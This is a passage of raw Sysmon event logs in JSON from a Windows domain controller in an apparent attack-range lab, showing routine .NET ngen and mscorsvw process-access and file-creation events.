07:00:54.887","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1326-5F25-0000-001054610B00}","TargetProcessId":"4164","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7451,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:00:55.090\r\nProcessGuid: {E2A3D6B1-1326-5F25-0000-001054610B00}\r\nProcessId: 4164\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1044-0\\Microsoft.Activities.Build.dll\r\nCreationUtcTime: 2020-08-01 07:00:55.090","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:00:55.090","ProcessGuid":"{E2A3D6B1-1326-5F25-0000-001054610B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1044-0\\Microsoft.Activities.Build.dll","CreationUtcTime":"2020-08-01 07:00:55.090","EventReceivedTime":"2020-08-01 07:00:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7452,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:55.121\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1327-5F25-0000-00100A670B00}\r\nTargetProcessId: 4104\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:55.121","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1327-5F25-0000-00100A670B00}","TargetProcessId":"4104","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7453,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:55.121\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1327-5F25-0000-00100A670B00}\r\nTargetProcessId: 4104\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:55.121","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1327-5F25-0000-00100A670B00}","TargetProcessId":"4104","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7454,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:55.121\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1327-5F25-0000-00100A670B00}\r\nTargetProcessId: 4104\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:55.121","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1327-5F25-0000-00100A670B00}","TargetProcessId":"4104","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7455,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:55.168\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1327-5F25-0000-00107B6A0B00}\r\nTargetProcessId: 5100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:55.168","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1327-5F25-0000-00107B6A0B00}","TargetProcessId":"5100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7456,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:55.168\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1327-5F25-0000-00107B6A0B00}\r\nTargetProcessId: 5100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:55.168","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1327-5F25-0000-00107B6A0B00}","TargetProcessId":"5100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7457,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:55.168\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1327-5F25-0000-00107B6A0B00}\r\nTargetProcessId: 5100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:55.168","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1327-5F25-0000-00107B6A0B00}","TargetProcessId":"5100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7458,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:55.308\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12EC-5F25-0000-00109E660A00}\r\nTargetProcessId: 4704\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 